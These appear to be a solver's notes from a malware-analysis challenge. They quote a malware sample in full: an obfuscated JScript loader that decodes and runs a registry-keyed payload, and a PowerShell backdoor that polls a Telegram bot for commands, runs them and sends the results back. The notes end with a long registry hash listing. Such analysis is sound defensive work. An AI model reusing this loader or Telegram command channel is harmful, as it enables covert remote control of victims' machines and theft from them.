18213d2229233b1845041220374d3d1e7e2a2641237421592621252737080b5a331f233102311204013a05260b2523322a20265103062837780e0920024f2578331417343f171d3f0035225527063a73242230362c3c0a3c3c183050037f120c213a2b507c2d20515a021118770023202c200d301e2d201121760c1e1d7b0c4e34480d182f7d22151d52021b2976141b1f76141b1776141b5a530d1d0641342024621d413c3d0f121421330e092f275d010222183876093811063e0b2a213d222e7f2b2529253b1845041d46164d372024230e091a2a09280038301d3031234e281a31310a370d1534133d082e3f3e181f213c350876130b590d0e33244d213015210a273c7d2701082823233c73264d304425182c7d25053c0c2d2926353e181f3f3c257d263b2651120923060324012c2a092030730f2c003639333f3b0b67231e210c1a332137241201393e7f17393e3517393e371739415b22270e413420233f203b2b3326110c3925563f2f30065b04221b1e2a0b5d3c052b22292210322e3c3b537c233b1845041e0d735b220a23270e0a1273243c3a20253366340d77231e3c0f3f770b3a6e02060c1b2515220f1b1439037f2b36021f12332f4c341e013b25244c2a0900527e0d2305762277301c3135113e1d3c2000350b043f3a3278172836217f255307060f3002452511333c21341574233f173f330d3429085e2b1624352f311d2c1600350b043f1453213613320c3b2739781a0d370d5a0a01152727091632095925380837667233631a1d3251232c253c621d040c2e39280c747f3b222a241035731a084709590c24151e1e2b373e1c3c072339561d2d306c30170935387d0d2c3000060b18373a32177f2b39257f2132602d091d06022130063b1e244c760a002d1f3d3211143f7134223c092f0a153c15123d360339130c782328521f232b22770d0d1a76590c01093c210a2b030801522d335705323372524727095c28235f335a06361c203a327821153621243e507c062037767f0a0e1124113b3332262c35360d2c38252277051e210c1a3c2137241101393e7f17393e3817393e3617327b1e1e1d23432430303e17360d001338003c2356663633635741221b1e2a0804332c3e34290828341b3a3b183a21150c5e130e0d2c4522250d16273401061c59362023543705306701023f53277424023b2435507c2d2851250d120d7d7a3c08591a0d377640371e763c0d301e2d201121760c1e157b205d531c22520a2a0b2c333d34341c213a320c3b150c0b3c1536670d0e311e4c217b2b29262038301333293f2027192d0d7c30060b1806320b5d111c0632787f2b3635232b5207271332071c2719244337247e600e301e2f243f223f25571d2e0b59303f323a273e1e3833073753032028391f2910361c763b225501251e124d251a1d601e2b117415383108240d1275264d231a32355c760804193b33370f1927241b1c250a0b012332701f1e2c2452377b7e25261e2f2e212c0f390b0d1625205a52460935302b0d2838122e227c3f1253783915220f2d1036075a1c272b02240e282914273b7d0a58072008332b2e227027010d1b01342402670c2b371b3610320c2610291f7f12297f5c080d7e5d0d0e2c2520342f371f3c0736303363370b07281f24502332232c06042d2626383a3274212b391f19122660022033114f27202c25271e2f3e213c1b7f0f27057508633b1e2225063d0e2c661803220c242918787e12261f271526640c252316450b3015210919492f1d12567e0a23012a0d733417093538730d2702592b221f363f257d242918783b2b397c101d2323592227153c213b282309332d380b233f7220772b46271b207326380e042c221f7e3f080c3b1326213d2b3273011e0e0e45270a7626271a382b0f23367d202762310863161d21213b2825010e5d3651740124271b1a233707002034032c0f2706410c7a0e370f302b750b02223b0b233f303367231a3a0820340e2c661d04080c203b29187d38227c3c103646060d370d5d0c0e30390f2015730f232a383937022d237c2b410e250528222c3c12370814371724747e15227c1b1529781a261924020f1e1e3f0d1a3023093c35372027013b24770e46222a2033173c3002021b0b76141b0f76141b07763808731e1e1d065b0c2024230e422b2c265910283b236b2c2577061d21312c2a0c37670003352a763c25397c1026213c2b32550120202052221e3f600d302b3d082856023333662c0d7305010d1b3b3d0a3b67112835267a3e5321223a222a24120b77180e3c1201251a763e2030382f2601223a3d2305373307301e233a1a2f240512522d2904383d0a3523130c297f102267100b202c00081e2b29262038301333293f2027192d0d7c30060b1806320b5d111c0632787f2b3635232b5207271332071c2719244337247e600e301e2f243f223f25571d2e0b59303f323a273e1e3833073753032028391f2910361c763b225501251e124d251a1d601e2b117415383108240d12742077331e222451312538011104530b212b32783b2b390335283656061c462b5e251e05250e301e2f2601223a3c57052b0a07300809355c2a0c2c055a28223a24120b083f3a320c263e18605b0b37340c24010e28222b487d1059357f25313f72336353200b0f50331d371d5b02320c203a222a26141b0f76141b7c53210e010c0b330d6921092b7d0c02223b330d370b3a042c27270c3316150634182d511709130f173f12082e3c3b530b1f2623125b220a236211201a370f59567f231d3832255a281d3d271106165d02042d52171d23082e3c2650031a240c5e1f164576573f7b2f12271f49710802083f202762373063531d21210e2d22151552021b0b7638087c22382229193b1845042733155d0a0e123e0f2038302106253c0d33062523730d080e3a597960467e42455a3b3c3e5529722212757c5f3347046c56040f321510392a17163336373f1c1017040d3e02562d3435002a23002018370e3a2a0332252a1d0d111307501c5a1828375a192c35232c1615286b0e1b2a490d363a4910071f1e58053d3d1e3f494b51617e585a302c10152e2759041b1139172b5a1d2c6f797f";KXLThQx1eIEsgIxNgwK="YTA88niSJLrPqLRUZCKqgETbyiLCOPZJSvgrdh";BKuhfIMaVHImUOt9FreZ6I="s0c2lY2yYE5Ul8b3hDBuPh6pUWwP96Gud5OETJurjWho";XeFMutnVMmJxSjDGPQ6UWW="nQdtB3Q3HMdUmrMfjYdw8Ck7ZnfMqpnmO9RuB6VRWruZ4m";GL1F5ur="";for(lEiDM7Bf=0;lEiDM7Bf<Hx86J.length;lEiDM7Bf+=2)GL1F5ur+=String.fromCharCode(parseInt(Hx86J.substr(lEiDM7Bf,2),16));GFyZLq2IlwZiswVshlQO="8i0Bs6RorAfSKHGazGdiSO0E";YNDfeZ7nhCFgDsnyuf6T="bq2xDTgFixeZHlssFrQLJ0KFbFQ6YwSMWI6pP6nFCKzg";thqEpeLEVHKEdDqA6gJPO="yvkbsKcYP2MQ9BmjY6ovcSQu7BPxFMOLofM1rLOH5eWS3fq";hdsbBW6vslEvfTgMZWAHw="usx65VNEaY6RscalJfMNqzf2ta51fK0S8Z";AOJxskajyajHlX8rrJwVjj="cH96okEBlOVbxbG9hynsBO";IzyFobDle1EfTbt0UaYR="NHH9vegXsxSIPYCixW9r2oAdqNUv";jiK=new ActiveXObject("WScript.Shell");hhfHSU7sHS="lIAsjZQE0o";lIAsjZQE0o=jiK.RegRead("HKCU\\software\\Classes\\AppXoiy6rzzu62tdihr9rgvofad4hz7tpf4m\\Shell\\open\\onYj");KDprMaI6LqDP="";for(dmcVPZEPsN0pkc=tVmtxai7BNjr8pYvV=0;tVmtxai7BNjr8pYvV<GL1F5ur.length;tVmtxai7BNjr8pYvV++){KDprMaI6LqDP+=String.fromCharCode(GL1F5ur.substr(tVmtxai7BNjr8pYvV,1).charCodeAt()^lIAsjZQE0o.substr(dmcVPZEPsN0pkc,1).charCodeAt());dmcVPZEPsN0pkc=(dmcVPZEPsN0pkc<lIAsjZQE0o.length-1)?dmcVPZEPsN0pkc+1:0;}VMCDaITzJEuxUzFfqW6CxmIv="RmzkSvCuNtQSvirqhosFwNevflt";g5CaYPcfMLBQAI4YxnKM="Ly4CoYRzm1dqgsT8Nith7ObPUA";RIAF5BwTKhPpCYMZmlOSH="9PXgGoNIsZgAAtv9KPbPl9qsEaUIq8eAKD0";ZllGThtipbS6AcFiANdtp9zPY="nuRBVGbAcB6OdhZEnSFGDHhg2TC8ZPACb7wc94fpDm0QN";oE4JKDACuNkqdZxpDsNfzDL="OR0QfvvwO9U33UCusmZStnP98k4rZ";eval(KDprMaI6LqDP);UheieKveLxiExaFZ2u7yrR="OMesq8pJZjHUSlFjUQXUEcygMg9aYzpmy0";amYEf1UDURGnOld8XVmet="g8v0M2CoTITjcUeZijB0ULjDHMEmPxb";rJlMSwPfGIHOqoqse5SYF="ki01xcJlzvVvKaZB5DmilXTLkdhQTt";cRkDgAkkUElXsDMMNfwvB3="CbO8GOb9qJiK3txOD4I31x553g";fKofUDgNWdzm6nK5sAD="k2wtzKHWBB9o5DJjDYUJkgwCaV2Yr";MPgXgpbcfPwwn4hJJzMsmHG="b4APzFzCv6FZ8rwNR";W05PzuKnofjNtIxYgKN="yaM1OoY576346cqEBmJSKvZwuZGHuXQaK7JY2Ullt5eOrE";HhxvXLzOLLi
Exerpt:
cRkDgAkkUElXsDMMNfwvB3="CbO8GOb9qJiK3txOD4I31x553g"
Question 5:
[5/10] What algorithm/encryption scheme is used in the final payload? (ie: RC4)
> AES
[+] Correct!
Eval:
[System.Net.ServicePointManager]::SecurityProtocol=@(("{1}{0}" -f'12','Tls'),("{1}{0}"-f 's11','Tl'),"Tls",("{0}{1}" -f'Ssl','3'));
$a1=gp ((("{1}{3}{0}{4}{2}{5}" -f 'ntk','HKCU','ro',':','ntkEnvi','nment')).rEpLaCe(([cHar]110+[cHar]116+[cHar]107),'\'));
$j2=$a1.Update;
$F2=$a1.guid;
$y3=$a1.tid;
$j5=$a1.hid;
$g1=$a1.bid;
function h1($j0){$v4=[System.Security.Cryptography.HashAlgorithm]::Create('md5');
$x3=$v4.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($j0));
$n6=[System.BitConverter]::ToString($x3);
return $n6.Replace('-','')};
function s9($n1,$x8){$k7=gi $n1;
foreach($b5 in $k7.Property){$u6=$k7.Name+";
"+$b5;
$x3=h1 $u6;
if($x8 -eq $x3){return ((gp $n1 -Name $b5).$b5)}}foreach($n2 in $k7.GetSubkeyNames()){$v8=s9 ($n1+"\"+$n2) $x8;
if($v8.Length -gt 0){return $v8}}return ""};
function n9{param([byte[]]$n3)$c4=New-Object System.IO.MemoryStream($n3,0,$n3.Length);
$c5=New-Object Byte[](32);
$x2=$c4.Read($c5,0,$c5.Length);
if($x2 -ne $c5.Length){exit}$b5=New-Object System.Security.Cryptography.Rfc2898DeriveBytes($m0,$c5);
$b7=$b5.GetBytes(32);
$v9=$b5.GetBytes(16);
$h5=New-Object Security.Cryptography.AesManaged;
$e3=$h5.CreateDecryptor($b7,$v9);
$w5=New-Object IO.MemoryStream;
$q7=New-Object System.Security.Cryptography.CryptoStream($c4,$e3,[System.Security.Cryptography.CryptoStreamMode]::Read);
$q7.CopyTo($w5);
$w5.Position=0;
$y5=New-Object IO.StreamReader($w5);
$u9=$y5.ReadToEnd();
$y5.Dispose();
$q7.Dispose();
$w5.Dispose();
$c4.Dispose();
return $u9};
$m0=s9 ((("{2}{0}{8}{5}{3}{1}{9}{6}{4}{7}"-f 'C','qIoclassesqIo','HK','e','rfac','r','e','e','U:qIosoftwa','Int')).REPlacE(([CHaR]113+[CHaR]73+[CHaR]111),[String][CHaR]92)) ("{0}{3}{5}{1}{2}{7}{4}{6}{8}" -f'6ca2','f6f6','465afb8','4d7c','cd1b','7','0c','2da','71f');
$g11=n9 $g1;
$j51=n9 $j5;
$y31=n9 $y3;
$i0="$g11`:$y31";
$g2=irm ("{0}{2}{4}{3}{1}{5}"-f'https://ifcon','/i','fi','me','g.','p');
if(-not (New-Object System.Threading.Mutex($false,$F2)).WaitOne(1)){
exit
};
if($j2 -and $F2){
irm -Uri "https://api.telegram.org/bot$($i0)/sendMessage?chat_id=$($j51)&text=$F2 ;; $env:COMPUTERNAME reconnected! "
} else {
$F2=[guid]::NewGuid().guid;
Set-ItemProperty ((("{1}{3}{4}{0}{2}"-f'o','HKCU','nment',':GFaGFaEn','vir')).REplAce('GFa',[StriNG][cHAr]92)) -name ("{0}{1}"-f'G','UID') -value $F2;
irm -Uri "https://api.telegram.org/bot$($i0)/sendMessage?chat_id=$($j51)&text=$F2 ;; $env:COMPUTERNAME new connection! "
};
if($j2 -isnot [int]){
$j2=0
};
while(1){
(irm -Uri "https://api.telegram.org/bot$($i0)/getUpdates").result|%{if($j2 -lt $_.update_id){$j2=$_.update_id;
$u6,$r4=$_.message.text -split ";;";
if(($u6 -like $g2) -or ($u6 -like $env:COMPUTERNAME) -or ($u6 -like $F2) -or ($u6 -like "all")){$r0=$($r4|iex)2>&1|Out-String;
if("" -eq $r0){$r0=("{1}{0}{2}" -f 'n','Task Do','e!!')}$u8=0;
while($u8 -lt $r0.Length){$r1=3999;
if(($r1+$u8)-gt $r0.Length){$r1=$r0.Length%3999}
irm -Uri "https://api.telegram.org/bot$($i0)/sendMessage?chat_id=$($j51)&text=$F2 : $($_.message.message_id)`n$($r0.Substring($u8,$r1)) ";
$u8+=$r1}}}
Set-ItemProperty ((("{0}{3}{1}{2}{4}" -f'HKCU:vQF','FEnvir','onme','vQ','nt')).rePLACe('vQF',[STRinG][ChAr]92)) -name ("{0}{1}"-f 'U','pdate') -value $j2}
}
Exerpt:
$h5=New-Object Security.Cryptography.AesManaged;
Question 6:
[6/10] What is the full path of the key containing the password to derive the encryption key? (ie: HKEY_LOCAL_MACHINE\SAM\SAM\LastSkuUpgrade)
> HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib
[+] Correct!
The powershell script looks in HKCU:\software\classes\Interface for the name/key that has an MD5sum of 6ca24d7c7f6f6465afb82dacd1b0c71f
$M0 = S9("HKCU:\software\classes\Interface")("6ca24d7c7f6f6465afb82dacd1b0c71f");
Figuring out syntax:
(gi HKCU:\software\classes\Interface).Name
HKEY_CURRENT_USER\software\classes\Interface
(gi "HKCU:\software\classes\Interface\{FF037274-455A-4E34-B5D1-D42DB866F9B7}\TypeLib").Property
(default)
Version
HKEY_CURRENT_USER\software\classes\Interface;{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}=dbdcdebfef09d32560a761c870641919
HKEY_CURRENT_USER\software\classes\Interface;{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}=a206d5f0f1b8819302cdc8a1d0dd0495
HKEY_CURRENT_USER\software\classes\Interface;{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}=eefe63048a4dce89782a630339ab8448
HKEY_CURRENT_USER\software\classes\Interface;{0f872661-c863-47a4-863f-c065c182858a}=4114a3eedac52f6f89d83950eb359b69
HKEY_CURRENT_USER\software\classes\Interface;{10C9242E-D604-49B5-99E4-BF87945EF86C}=421a3ff784cbaea3df7fed469617b336
HKEY_CURRENT_USER\software\classes\Interface;{1196AE48-D92B-4BC7-85DE-664EC3F761F1}=705daa44404301d7ed89eeea7507e1ca
HKEY_CURRENT_USER\software\classes\Interface;{13987a48-a837-465d-b6be-8302db0e4ce6}=0566df6e54682bdecd4e7ea24daf419a
HKEY_CURRENT_USER\software\classes\Interface;{1B71F23B-E61F-45C9-83BA-235D55F50CF9}=8d6e9099e533eca9653cddac858e73aa
HKEY_CURRENT_USER\software\classes\Interface;{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}=a97dae37db5a8acb6f9c39583ae7bb1b
HKEY_CURRENT_USER\software\classes\Interface;{1EDD003E-C446-43C5-8BA0-3778CC4792CC}=93def1beae01b22482946b83bf1cfa04
HKEY_CURRENT_USER\software\classes\Interface;{22A68885-0FD9-42F6-9DED-4FB174DC7344}=de658431840c7107098b779258655eab
HKEY_CURRENT_USER\software\classes\Interface;{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}=2bc0cc55ec1cf4c7b2804c464ba31a1e
HKEY_CURRENT_USER\software\classes\Interface;{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}=32f4fa37ecc4f9bbc64f7ea9cea0ecac
HKEY_CURRENT_USER\software\classes\Interface;{2EB31403-EBE0-41EA-AE91-A1953104EA55}=069791f003eefb731118ff64ff9548d6
HKEY_CURRENT_USER\software\classes\Interface;{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}=3f3c8cf9a8dbec56913a83c805224bed
HKEY_CURRENT_USER\software\classes\Interface;{31508CC7-9BC7-494B-9D0F-7B1C7F144182}=8b7ae3173beff80750ab15527c8f51c7
HKEY_CURRENT_USER\software\classes\Interface;{385ED83D-B50C-4580-B2C3-9E64DBE7F511}=640d19747fb8462486954f25a1b8c72d
HKEY_CURRENT_USER\software\classes\Interface;{390AF5A7-1390-4255-9BC9-935BFCFA5D57}=c6696fdda4ab7197a419ef0fd54d7f8d
HKEY_CURRENT_USER\software\classes\Interface;{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}=a0bd51a4665e4d576c16f5c1e003fb08
HKEY_CURRENT_USER\software\classes\Interface;{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}=df9c7f13b96da7ec14fd9e78a1ebfce5
HKEY_CURRENT_USER\software\classes\Interface;{466F31F7-9892-477E-B189-FA5C59DE3603}=95c00b58ad41c928225a32849a64b85d
HKEY_CURRENT_USER\software\classes\Interface;{50487D09-FFA9-45E1-8DF5-D457F646CD83}=c9de6a3f9a6f1db1e28cea4d9f8c7708
HKEY_CURRENT_USER\software\classes\Interface;{54034913-37F9-4E26-8646-3D2EF536C786}=e37e64e89dc6305767452ee114a43330
HKEY_CURRENT_USER\software\classes\Interface;{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}=fb0bf883d6971e96c3e941146bc9ab8d
HKEY_CURRENT_USER\software\classes\Interface;{679EC955-75AA-4FB2-A7ED-8C0152ECF409}=d936e814dd4de12a53e066ff8a7c6dab
HKEY_CURRENT_USER\software\classes\Interface;{6A821279-AB49-48F8-9A27-F6C59B4FF024}=395d27651fc3fe4338f67e9b73fc77d7
HKEY_CURRENT_USER\software\classes\Interface;{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}=7b0496942a43a7e7926b14d102bae5d4
HKEY_CURRENT_USER\software\classes\Interface;{HKEY_CURRENT_USER\software\classes\Interface;{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}=dbdcdebfef09d32560a761c870641919HKEY_CURRENT_USER\software\classes\Interface;=aeb379f9915014fc753632029dd21433
HKEY_CURRENT_USER\software\classes\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8};(default)=72c033cf9b416211b2f3f4644da89ba0
HKEY_CURRENT_USER\software\classes\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67};(default)=669e2b37a452094017d1721dae8909be
HKEY_CURRENT_USER\software\classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8};(default)=6aa7908267bb922ab0d35ed1564a67ed
HKEY_CURRENT_USER\software\classes\Interface\{0f872661-c863-47a4-863f-c065c182858a};(default)=ec97d546f1294d6eab9b16531bb735f4
HKEY_CURRENT_USER\software\classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C};(default)=f35acaf0a318b88b9743dcb75fa4885c
HKEY_CURRENT_USER\software\classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1};(default)=8ca6145962b72baa2f886edb6a81425b
HKEY_CURRENT_USER\software\classes\Interface\{13987a48-a837-465d-b6be-8302db0e4ce6};(default)=d3f1157220c2059ee02866c7e24b3d19
HKEY_CURRENT_USER\software\classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9};(default)=2f61cffcacfd2192b2c8c9e921c12d57
HKEY_CURRENT_USER\software\classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc};(default)=dd5788aa736131506d91d76cd542feb9
HKEY_CURRENT_USER\software\classes\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC};(default)=e257f22ee06bf58293a1d941105d5fdd
HKEY_CURRENT_USER\software\classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344};(default)=939740483d4cde4a0b1ef73fb1808472
HKEY_CURRENT_USER\software\classes\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D};(default)=018d94947ae802013b4d5825ad6f57cd
HKEY_CURRENT_USER\software\classes\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596};(default)=d48e14038755a8140ff4575fb49825e2
HKEY_CURRENT_USER\software\classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55};(default)=e4a36e6648cd9bf94409b6d24dc74c0e
HKEY_CURRENT_USER\software\classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E};(default)=c3e3c2cb641e3894e99188e43ebdb7ed
HKEY_CURRENT_USER\software\classes\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182};(default)=861cdc74c807c7e1d808ad8f52ab7773
HKEY_CURRENT_USER\software\classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511};(default)=22e9c663da4dbdd48be6bede3403479a
HKEY_CURRENT_USER\software\classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57};(default)=f3498713a65f121d26eb73b5c24bb115
HKEY_CURRENT_USER\software\classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5};(default)=cf948dc2adb1e79411c3b324995191a3
HKEY_CURRENT_USER\software\classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7};(default)=999138b84802eabacfb00a7a0371d267
HKEY_CURRENT_USER\software\classes\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603};(default)=86a45237216ebb4807cad220e67f93e3
HKEY_CURRENT_USER\software\classes\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83};(default)=49d8a00bf3b2f68d90bdd9c699219e9e
HKEY_CURRENT_USER\software\classes\Interface\{54034913-37F9-4E26-8646-3D2EF536C786};(default)=2a13e6ea20bf2d378d8bd34ed72c4e93
HKEY_CURRENT_USER\software\classes\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C};(default)=fec484ca120ef06768ad8bd2f373cb2e
HKEY_CURRENT_USER\software\classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409};(default)=e2095a9bf048f976f5a6cf1f960eb05a
HKEY_CURRENT_USER\software\classes\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024};(default)=9453265044c0410c2b64d566e881be5d
HKEY_CURRENT_USER\software\classes\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755};(default)=4956980a0919dbd41ce865569315c652
HKEY_CURRENT_USER\software\classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33};(default)=7b04d590e49688a93b3c77890f6cc5bf
HKEY_CURRENT_USER\software\classes\Interface\{886DFE8E-D1BB-4062-B7C6-57DA328A37F8};(default)=0b11d2c8f5b77e71e4c25b87c3f9a55b
HKEY_CURRENT_USER\software\classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98};(default)=db712ec652027da5100fe862a324397b
HKEY_CURRENT_USER\software\classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2};(default)=c852a272f66cfc35c501ecc61aa86c76
HKEY_CURRENT_USER\software\classes\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C};(default)=d9cdc0ef331577fe07a3a853c12c052c
HKEY_CURRENT_USER\software\classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF};(default)=bdbad8a8a20ad84c66d414cff7f4e96a
HKEY_CURRENT_USER\software\classes\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B};(default)=26a463448ade7d8c823720c3c6603904
HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334};(default)=b5471dc26ffa5e95c78552a5948d9652
HKEY_CURRENT_USER\software\classes\Interface\{A87958FF-B414-7748-9183-DBF183A25905};(default)=fdb67d359934f390ad6a650e772ecffa
HKEY_CURRENT_USER\software\classes\Interface\{A91EFACB-8B83-4B84-B797-1C8CF3AB3DCB};(default)=8c143fdfc7d785d43369377314d566fe
HKEY_CURRENT_USER\software\classes\Interface\{AB0CD980-906C-4FBB-9A5D-9E32A3C0CB37};(default)=aa8e0e3b7a1ab7e5fd0399be9fec9098
HKEY_CURRENT_USER\software\classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40};(default)=9c68ac84e9c38463175d7810c617b5c1
HKEY_CURRENT_USER\software\classes\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A};(default)=fb36d1a786c0397064e5960f3fb25494
HKEY_CURRENT_USER\software\classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E};(default)=df85daca2719469946a42d59aeeaa43a
HKEY_CURRENT_USER\software\classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07};(default)=0a966706a1c9a177f15915193f2c436a
HKEY_CURRENT_USER\software\classes\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A};(default)=545b38e4373a23580462199c19a338b0
HKEY_CURRENT_USER\software\classes\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2};(default)=335c362063ac6ebff0bf256642bddf09
HKEY_CURRENT_USER\software\classes\Interface\{B5CDC0E5-9558-4899-A58B-5D894F493C1D};(default)=e21fd918f7e8146ecf83a065856ff0f3
HKEY_CURRENT_USER\software\classes\Interface\{B5E5EE2E-E012-4FC8-BCE0-C956AF66C4F3};(default)=46fed0211ff14a4183775b66899737f4
HKEY_CURRENT_USER\software\classes\Interface\{c1439245-96b4-47fc-b391-679386c5d40f};(default)=f46464ffef610c453c5b8d37ff34a767
HKEY_CURRENT_USER\software\classes\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A};(default)=5e91e945109283967465ffbe3054503b
HKEY_CURRENT_USER\software\classes\Interface\{C47B67D4-BA96-44BC-AB9E-1CAC8EEA9E93};(default)=8a30fa739c3211cea5db1832c2ee094c
HKEY_CURRENT_USER\software\classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C};(default)=35bd688074bd819994285890d115af24
HKEY_CURRENT_USER\software\classes\Interface\{D32F7B3A-DEC8-4F44-AF28-E9B7FEB62118};(default)=6cd63240ed58eedf5be20c65403884b9
HKEY_CURRENT_USER\software\classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c};(default)=8ec559a3edead64c5e301a4c43d456a9
HKEY_CURRENT_USER\software\classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52};(default)=a542df0018b139a18d09a4a11d39a7f9
HKEY_CURRENT_USER\software\classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7};(default)=4c1c5e2d006ce54bd75201affac36d8e
HKEY_CURRENT_USER\software\classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF};(default)=44524ede26a976886c2fdebe8a147e91
HKEY_CURRENT_USER\software\classes\Interface\{EB3EED27-BCC1-4E91-A65B-9C2AFB189F4F};(default)=8a718eeee9c465d20c36455018986e26
HKEY_CURRENT_USER\software\classes\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3};(default)=26a4019106b1101928e2d5523096d1c9
HKEY_CURRENT_USER\software\classes\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406};(default)=3b669df32600a7eb23d3359ffc852d93
HKEY_CURRENT_USER\software\classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6};(default)=0d0466df080a81ed888be8da1c53f31c
HKEY_CURRENT_USER\software\classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17};(default)=25d5b0175f525e4e01fa08d0c68ee94b
HKEY_CURRENT_USER\software\classes\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\ProxyStubClsid32;(default)=87f5e58a3e3679df6be332b9e70949c4
HKEY_CURRENT_USER\software\classes\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\ProxyStubClsid32;(default)=77bb5e476b91d8d9175c212d8c932229
HKEY_CURRENT_USER\software\classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\ProxyStubClsid32;(default)=11001d70b80c17c7f5b07bc38eb02e03
HKEY_CURRENT_USER\software\classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\ProxyStubClsid32;(default)=a33147bf28c6488bfc1b068fed7c0249
HKEY_CURRENT_USER\software\classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\ProxyStubClsid32;(default)=1fa6b8e2301965b8426ff1b1b76fa443
HKEY_CURRENT_USER\software\classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\ProxyStubClsid32;(default)=e4b8f098ef212d4cbd35ba51ef2c3d48
HKEY_CURRENT_USER\software\classes\Interface\{13987a48-a837-465d-b6be-8302db0e4ce6}\ProxyStubClsid32;(default)=36118ec94caf23e3781b86d2b6fbc37b
HKEY_CURRENT_USER\software\classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\ProxyStubClsid32;(default)=49587d6fbe5365d72be3a1fa1411b714
HKEY_CURRENT_USER\software\classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ProxyStubClsid32;(default)=3521607f23a86c804c1ba80ded5bcecc
HKEY_CURRENT_USER\software\classes\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\ProxyStubClsid32;(default)=855e26113dfd343413550a05b160b4b2
HKEY_CURRENT_USER\software\classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\ProxyStubClsid32;(default)=c436ebda79e1841ad0f88c9b171edf24
HKEY_CURRENT_USER\software\classes\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\ProxyStubClsid32;(default)=5b13f62203ed8d1519e4d3745be1c80f
HKEY_CURRENT_USER\software\classes\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}\ProxyStubClsid32;(default)=349b40a61517a24d26fb78817354e6b3
HKEY_CURRENT_USER\software\classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32;(default)=1d61d7ae409dd5275fb2ea179151c8cf
HKEY_CURRENT_USER\software\classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\ProxyStubClsid32;(default)=abe8236832b9d1d1f48b436c17676552
HKEY_CURRENT_USER\software\classes\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\ProxyStubClsid32;(default)=06b4b1488c755d1462996de377ec5f1e
HKEY_CURRENT_USER\software\classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\ProxyStubClsid32;(default)=2e59b4b32b01b928374ff2ea7974c1ea
